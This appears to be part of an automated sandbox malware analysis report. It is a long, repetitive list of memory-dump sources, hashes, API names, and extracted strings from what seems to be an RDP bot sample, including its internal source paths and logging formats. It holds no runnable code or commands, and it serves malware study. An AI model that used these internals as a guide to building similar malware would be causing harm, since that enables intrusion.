                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: 1f8b6be4531e4f61a9b791164e86e5d65f11346d678c3961dc24315970669e59
                                                                                                                                                  • Instruction ID: b45ef00d2f7cad4a9e37787a2930321725fc9a89bb1f08694697b8f22e4b96dd
                                                                                                                                                  • Opcode Fuzzy Hash: 1f8b6be4531e4f61a9b791164e86e5d65f11346d678c3961dc24315970669e59
                                                                                                                                                  • Instruction Fuzzy Hash: 7AF0F022A0830A42F5528F88B9503B97344AF443E4F480236EF4D46690EF3CE9898300
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158612916.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158658328.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158682587.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158717664.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158748673.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158773276.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158487373.00007FF8BFB30000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158530509.00007FF8BFB40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158550873.00007FF8BFB48000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158571573.00007FF8BFB4B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158593544.00007FF8BFB4C000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158487373.00007FF8BFB30000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158530509.00007FF8BFB40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158550873.00007FF8BFB48000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158571573.00007FF8BFB4B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158593544.00007FF8BFB4C000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158487373.00007FF8BFB30000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158530509.00007FF8BFB40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158550873.00007FF8BFB48000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158571573.00007FF8BFB4B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158593544.00007FF8BFB4C000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158487373.00007FF8BFB30000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158530509.00007FF8BFB40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158550873.00007FF8BFB48000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158571573.00007FF8BFB4B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158593544.00007FF8BFB4C000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158487373.00007FF8BFB30000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158530509.00007FF8BFB40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158550873.00007FF8BFB48000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158571573.00007FF8BFB4B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158593544.00007FF8BFB4C000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Sleepmemcpy
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1125407320-0
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Sleepmemcpy
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1125407320-0
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Sleepmemcpy
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1125407320-0
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Sleepmemcpy
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1125407320-0
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Sleepmemcpy
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1125407320-0
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00007FF6BE031360: GetModuleHandleExA.KERNEL32(?,?,?,?,?,?,00007FF6BE0384AF), ref: 00007FF6BE03137E
                                                                                                                                                  • SleepEx.KERNEL32 ref: 00007FF6BE0388DC
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HandleModuleSleep
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1071907932-0
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$Heap$FreeProcessfclosefread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4240746492-0
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$Heap$FreeProcessfclosefread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4240746492-0
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$Heap$FreeProcessfclosefread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4240746492-0
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$Heap$FreeProcessfclosefread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4240746492-0
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$Heap$FreeProcessfclosefread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4240746492-0
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$Heap$FreeProcessfclosefread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4240746492-0
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ServiceStatus
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3969395364-0
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: rand_s
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 863162693-0
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalEnterSection
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1904992153-0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: (data != NULL)$(len > 0)$H:/Projects/rdp/bot/codebase/utils.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$crc32
                                                                                                                                                  • API String ID: 0-3120737415
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$_mbscat_mbscpy$strcmp
                                                                                                                                                  • String ID: (dst != NULL)$(src != NULL)$*$H:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Copy(f_src=%s,f_dst=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(src=%s,dst=%s,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s)$[I] (%s) -> Filtered(f_src=%s,flt=%s)$fs_dir_copy$|
                                                                                                                                                  • API String ID: 4213218670-1088979775
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen
                                                                                                                                                  • String ID: %TEMP%$(entry != NULL)$(package != NULL)$(strlen(entry) <= 0xff)$H:/Projects/rdp/bot/codebase/package.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed to read the entry file(package=%s,entry=%s,err=%08x)$[E] (%s) -> Failed to read the package file(package=%s,entry=%s,err=%08x)$[E] (%s) -> Failed(package=%s,entry=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(package=%s,entry=%s)$mem_alloc$package_pack
                                                                                                                                                  • API String ID: 39653677-2518748746
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$DirectoryErrorLastRemove_mbscpystrcmp$fflushfwrite
